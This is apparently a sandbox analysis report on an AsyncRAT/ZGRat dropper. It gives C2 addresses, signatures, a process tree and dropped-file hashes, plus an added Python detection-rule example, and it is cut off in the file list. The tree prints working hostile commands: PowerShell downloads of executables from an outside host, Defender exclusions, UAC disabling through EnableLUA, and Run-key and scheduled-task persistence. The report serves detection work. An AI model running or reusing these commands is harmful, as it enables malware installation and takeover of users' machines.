Analysis

  • max time kernel
    147s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231023-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20231023-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    15/11/2023, 10:45

General

  • Target

    resources.exe

  • Size

    65KB

  • MD5

    693a87312aa1f6a31906187bda5293df

  • SHA1

    aaf236f3c5e791bd4f98d2c12758ff251c3b8474

  • SHA256

    f33cdca93db97c4b84af9f01216f3b7bcb3cf1865df84cb3b64fbbeed7057a2a

  • SHA512

    1c6e618ddb11d438286a032e6acd79fcb5fd89efa4fd2f3b1b4ae91785ac4a7ef8b894b910cd8394225118974e7a19aeb337313273cda2d2b0d9923cb3a212e2

  • SSDEEP

    1536:dfHn5T82s45tlDqwIdvKKBLutvfFoV/XUuL:dfH5TZsYnjIdbCNNoV/Xt

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

WinDefault

C2

46.1.103.69:4263

Mutex

WinDefault

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

OperaCert

C2

46.1.103.69:7355

Mutex

OperaCert

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is a remote access trojan written in C#, designed to remotely monitor and control other computers.

  • Detect ZGRat V1 31 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • ZGRat

    ZGRat is a remote access trojan written in C#.

  • Async RAT payload 2 IoCs
  • Blocklisted process makes network request 14 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 16 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 61 IoCs
  • Suspicious use of AdjustPrivilegeToken 28 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\resources.exe
    "C:\Users\Admin\AppData\Local\Temp\resources.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4448
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\00b65495-88ce-45af-bf00-3dc3c78edb4f.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4136
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1148
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/c0c5cf18ed5b12d0cf2e77312e553328-Full.zip' -OutFile uuac.bat"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3160
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b65cd9956dfe1877c72ffe687fc632b4-Full.zip' -OutFile israil.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5084
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4740
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4456
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b00ef4b757bc25a0f41c3d74961ff9a0-Full.zip' -OutFile es.bat"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5104
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 2
        3⤵
        • Delays execution with timeout.exe
        PID:768
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/123bdf05b4b261644ff4579b8bd78806-Full.zip' -OutFile RunNihaiersion.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2980
      • C:\Users\Public\Music\RunNihaiersion.exe
        RunNihaiersion.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:664
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\bes.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2184
          • C:\Windows\SysWOW64\net.exe
            net session
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1640
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 session
              6⤵
                PID:2552
            • C:\Users\Public\Music\israil.exe
              "C:\Users\Public\Music\israil.exe"
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:4504
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\installer2.bat" "
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:820
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Powershell -Command "Set-MpPreference -ExclusionExtension 'exe', 'dll', 'scr'"
                  7⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4472
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Powershell -Command "Set-MpPreference -ExclusionPath 'C:\'"
                  7⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2696
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/d3e4bf5f503e63ca9f51a3c19c842b0d-Full.zip' -OutFile xx.exe"
                  7⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4164
                • C:\Users\Admin\AppData\Local\Temp\xx.exe
                  xx.exe
                  7⤵
                  • Executes dropped EXE
                  PID:684
                  • C:\Windows\system32\cmd.exe
                    "cmd" /C C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe
                    8⤵
                      PID:1856
                      • C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe
                        C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe
                        9⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        PID:4456
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
                          10⤵
                          • Blocklisted process makes network request
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:408
                          • C:\Users\Admin\AppData\Roaming\2WinDefault.exe
                            "C:\Users\Admin\AppData\Roaming\2WinDefault.exe"
                            11⤵
                            • Executes dropped EXE
                            PID:6088
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 6088 -s 808
                              12⤵
                              • Program crash
                              PID:4584
                    • C:\Windows\system32\cmd.exe
                      "cmd" /C C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe
                      8⤵
                        PID:5100
                        • C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe
                          C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe
                          9⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          PID:2148
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
                            10⤵
                            • Blocklisted process makes network request
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2880
                            • C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
                              "C:\Users\Admin\AppData\Roaming\ChromeCrt.exe"
                              11⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5896
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                12⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2744
                      • C:\Windows\system32\cmd.exe
                        "cmd" /C C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe
                        8⤵
                          PID:2672
                          • C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe
                            C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe
                            9⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            PID:376
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
                              10⤵
                              • Blocklisted process makes network request
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3148
                              • C:\Users\Admin\AppData\Roaming\VisualStudioo.exe
                                "C:\Users\Admin\AppData\Roaming\VisualStudioo.exe"
                                11⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:5892
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  #cmd
                                  12⤵
                                  • Suspicious use of SetThreadContext
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2212
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert' -Value '"C:\Users\Admin\AppData\Roaming\VisualStudioCert\VisualStudioCert.exe"' -PropertyType 'String'
                                    13⤵
                                    • Adds Run key to start application
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1340
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                    13⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1132
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                    13⤵
                                      PID:4140
                          • C:\Windows\system32\cmd.exe
                            "cmd" /C C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe
                            8⤵
                              PID:4836
                              • C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe
                                C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe
                                9⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                PID:2000
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
                                  10⤵
                                  • Blocklisted process makes network request
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4992
                                  • C:\Users\Admin\AppData\Roaming\OperaCrt.exe
                                    "C:\Users\Admin\AppData\Roaming\OperaCrt.exe"
                                    11⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:5492
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert' -Value '"C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe"' -PropertyType 'String'
                                      12⤵
                                      • Adds Run key to start application
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:452
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                      #cmd
                                      12⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5860
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "cmd" /C schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                      12⤵
                                        PID:2084
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                          13⤵
                                          • Creates scheduled task(s)
                                          PID:5104
                              • C:\Windows\system32\cmd.exe
                                "cmd" /C C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe
                                8⤵
                                  PID:3352
                                  • C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe
                                    C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe
                                    9⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    PID:544
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
                                      10⤵
                                      • Blocklisted process makes network request
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5124
                                      • C:\Users\Admin\AppData\Roaming\WiDefault.exe
                                        "C:\Users\Admin\AppData\Roaming\WiDefault.exe"
                                        11⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5400
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt' -Value '"C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe"' -PropertyType 'String'
                                          12⤵
                                          • Adds Run key to start application
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5512
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "cmd" /C schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                          12⤵
                                            PID:5516
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                              13⤵
                                              • Creates scheduled task(s)
                                              PID:1636
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            #cmd
                                            12⤵
                                              PID:5584
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              #cmd
                                              12⤵
                                                PID:5600
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                #cmd
                                                12⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5636
                                      • C:\Windows\system32\cmd.exe
                                        "cmd" /C C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe
                                        8⤵
                                          PID:4444
                                          • C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe
                                            C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe
                                            9⤵
                                            • Drops startup file
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2076
                                        • C:\Windows\system32\cmd.exe
                                          "cmd" /C C:\Users\Admin\AppData\Local\Temp\zhXaQqWy8P.exe
                                          8⤵
                                            PID:2520
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 8
        3⤵
        • Delays execution with timeout.exe
        PID:2580
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/05b73b535c4337c16fc3f039c1b30dc1-Full.zip' -OutFile RunihaiVersion.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1936
      • C:\Users\Public\Music\RunihaiVersion.exe
        RunihaiVersion.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:376
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\es.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3680
          • C:\Windows\SysWOW64\net.exe
            net session
            5⤵
            PID:2456
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 session
              6⤵
              PID:2880
          • C:\Users\Public\Music\israil2.exe
            "C:\Users\Public\Music\israil2.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            PID:3872
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\uuac.bat" "
              6⤵
              PID:2604
              • C:\Windows\SysWOW64\reg.exe
                reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                7⤵
                • UAC bypass
                • Modifies registry key
                PID:4080
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:2808
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6088 -ip 6088
    1⤵
    PID:5208
  • C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
    1⤵
    PID:2344
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k UnistackSvcGroup
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3180
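
The Signatures list and the process tree above record the behaviours that matter for detection: Invoke-WebRequest pulling executables from img.guildedcdn.com into Public\Music and Temp, Set-MpPreference exclusions for C:\ and for exe/dll/scr, HKCU Run values written with New-ItemProperty, schtasks /create with /rl HIGHEST whose action lives under AppData\Roaming, EnableLUA forced to 0, and RegAsm/RegSvcs/InstallUtil spawned by a dropped binary. The Python below is an added example, not part of the sandbox report and not any vendor's detection content: it runs a small rule set over process-creation events constructed from the command lines in this tree. The Event and Finding fields and the rule names are this example's own assumptions (they loosely mirror Sysmon Event ID 1 but are not a real schema), and the final benign control event is constructed.

```python
"""Rules run over constructed process-creation events from the tree above.
Added example, not part of the sandbox report; the Event/Finding fields and
rule names are assumptions that loosely mirror Sysmon Event ID 1."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    pid: int
    image: str          # full path of the created process
    cmdline: str        # command line as captured
    parent_image: str   # full path of the parent process


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


DOTNET_LOLBINS = {"regasm.exe", "regsvcs.exe", "installutil.exe"}
EXEC_EXT = r"\.(?:exe|bat|cmd|dll|ps1|vbs|scr)\b"


def basename(path: str) -> str:
    return path.replace("/", "\\").rstrip("\\").rsplit("\\", 1)[-1].lower()


def check_event(ev: Event) -> list:
    # Match on a lowercased copy so the odd casing in "Powershell"/"Invoke-Webrequest" cannot slip past.
    cl, low, img = ev.cmdline, ev.cmdline.lower(), basename(ev.image)
    hits = []

    # Defender tampering: Set-MpPreference adding path or extension exclusions
    if "set-mppreference" in low and re.search(r"-exclusion(?:path|extension)\b", low):
        hits.append(Finding("defender_exclusion_added", ev.pid, cl))

    # UAC switched off: EnableLUA=0 under Policies\System (uuac.bat in the tree)
    if img == "reg.exe" and re.search(r"policies\\system.*\benablelua\b.*/d\s+0\b", low):
        hits.append(Finding("uac_disabled_enablelua", ev.pid, cl))

    # Persistence: HKCU Run value written through PowerShell *-ItemProperty
    if re.search(r"currentversion\\run\b", low) and re.search(r"(?:new|set)-itemproperty", low):
        name = re.search(r"-name\s+'([^']+)'", cl, re.I)
        hits.append(Finding("run_key_persistence", ev.pid, name.group(1) if name else cl))

    # Persistence: scheduled task at highest run level whose action lives in a user profile
    if img == "schtasks.exe" and "/create" in low and "/rl highest" in low and "\\appdata\\" in low:
        tn = re.search(r"/tn\s+(\S+)", cl, re.I)
        hits.append(Finding("schtask_highest_from_userprofile", ev.pid, tn.group(1) if tn else cl))

    # Staging: Invoke-WebRequest saving to a file with an executable or script extension
    if "invoke-webrequest" in low:
        out = re.search(r"-outfile\s+'?([^\s'\"]+" + EXEC_EXT + ")", cl, re.I)
        host = re.search(r"https?://([^/'\"\s]+)", cl, re.I)
        if out:
            hits.append(Finding("download_to_executable", ev.pid,
                                f"{host.group(1) if host else '?'} -> {out.group(1)}"))

    # Injection target: a .NET utility started by a binary under C:\Users (the report shows
    # '#cmd' where the child's arguments were not captured, so do not key on arguments)
    if img in DOTNET_LOLBINS and "\\users\\" in ev.parent_image.lower():
        hits.append(Finding("dotnet_utility_from_user_binary", ev.pid, basename(ev.parent_image)))
    return hits


def scan(events) -> list:
    return [f for ev in events for f in check_event(ev)]


PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"
RUN = r"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# Constructed events: command lines and PIDs copied from the process tree, plus one benign control.
SAMPLE_EVENTS = [
    Event(1148, PS, "Powershell -Command \"Invoke-Webrequest 'https://img.guildedcdn.com/"
          "ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat\"", CMD),
    Event(4472, PS, "Powershell -Command \"Set-MpPreference -ExclusionExtension 'exe', 'dll', 'scr'\"", CMD),
    Event(452, PS, f"\"powershell.exe\" Remove -ItemProperty -Path '{RUN}' -Name 'OperaCert';"
          f"New-ItemProperty -Path '{RUN}' -Name 'OperaCert' -Value "
          "'\"C:\\Users\\Admin\\AppData\\Roaming\\OperaCert\\OperaCert.exe\"' -PropertyType 'String'",
          r"C:\Users\Admin\AppData\Roaming\OperaCrt.exe"),
    Event(5104, r"C:\Windows\SysWOW64\schtasks.exe",
          r'schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe"'
          r" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f", CMD),
    Event(4080, r"C:\Windows\SysWOW64\reg.exe",
          r"reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
          r" /v EnableLUA /t REG_DWORD /d 0 /f", CMD),
    Event(2744, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
          r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"',
          r"C:\Users\Admin\AppData\Roaming\ChromeCrt.exe"),
    Event(999, r"C:\Windows\System32\schtasks.exe", "schtasks /query /fo LIST", r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule:36} pid={f.pid:<5} {f.detail}")
```

Each of the six malicious events fires exactly one rule and the benign schtasks query fires none. Because the report shows `#cmd` where RegAsm's command line was not captured, the injection-target rule keys on the parent's location rather than on arguments; on real telemetry you would also check the parent's signature status and the child's image loads, since the same RegAsm/RegSvcs/InstallUtil images are launched legitimately by installers under Program Files.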

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Comms\UnistoreDB\store.jfm

    Filesize

    16KB

    MD5

    1f5315e49ee05ffc816a640c18f18507

    SHA1

    21f0d367c32a084d68f3af16e2a3915ed9bca6a0

    SHA256

    d1c5aa5092330237c7f636e2b899957f0d1f8e82a87007c54e71d6efd98a4a5c

    SHA512

    75104ca8cc835ca89c29690e850e2316d43de25274fcd2db8c3b4af4651ea7f8e43e3b05ed4255e40efbad0f0904045c4bee7630c8d663b0bda998a3ff28c8a7

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\iEwFLK0FEN.exe.log

    Filesize

    226B

    MD5

    28d7fcc2b910da5e67ebb99451a5f598

    SHA1

    a5bf77a53eda1208f4f37d09d82da0b9915a6747

    SHA256

    2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c

    SHA512

    2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    556084f2c6d459c116a69d6fedcc4105

    SHA1

    633e89b9a1e77942d822d14de6708430a3944dbc

    SHA256

    88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

    SHA512

    0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\israil2.exe.log

    Filesize

    226B

    MD5

    916851e072fbabc4796d8916c5131092

    SHA1

    d48a602229a690c512d5fdaf4c8d77547a88e7a2

    SHA256

    7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d

    SHA512

    07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    1KB

    MD5

    4280e36a29fa31c01e4d8b2ba726a0d8

    SHA1

    c485c2c9ce0a99747b18d899b71dfa9a64dabe32

    SHA256

    e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

    SHA512

    494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    16KB

    MD5

    bb7d76a883009ce8cc0221fded7cfd1d

    SHA1

    58ba94cba93d89804e855d488967bb562a48e186

    SHA256

    7b7c0a5c243d391e610de05a93fa6d9401872daba4b05eaeef9706dadcf7ec8b

    SHA512

    4a3c9c8f39c7130766a314bcd6c888c1dbbed832a8347ccd6d7d65ef696e99ba5a1a4ba89f49524edd31cba74810e9e6f6915c4c63f67ccc6ab89b0d9b8d0aa4

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    16KB

    MD5

    99d20a2441228126a68775b53ec0b0f3

                                              SHA1

                                              9c6347230648b26ae38d36ecf0bfb7d6b404e6ae

                                              SHA256

                                              6e80859e9ecac811cfbbc8876afaeb83935a4a346dfd6388f44fcc8e65b97802

                                              SHA512

                                              d98d77de92da93912cfb72e3fe3b10189eba4bce881f340baf2255c46678cd770fa69d92ed3e233df64f47d9021db4a3c37dadf6ca466ad6fbf043c774f49ada

                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Filesize

                                              16KB

                                              MD5

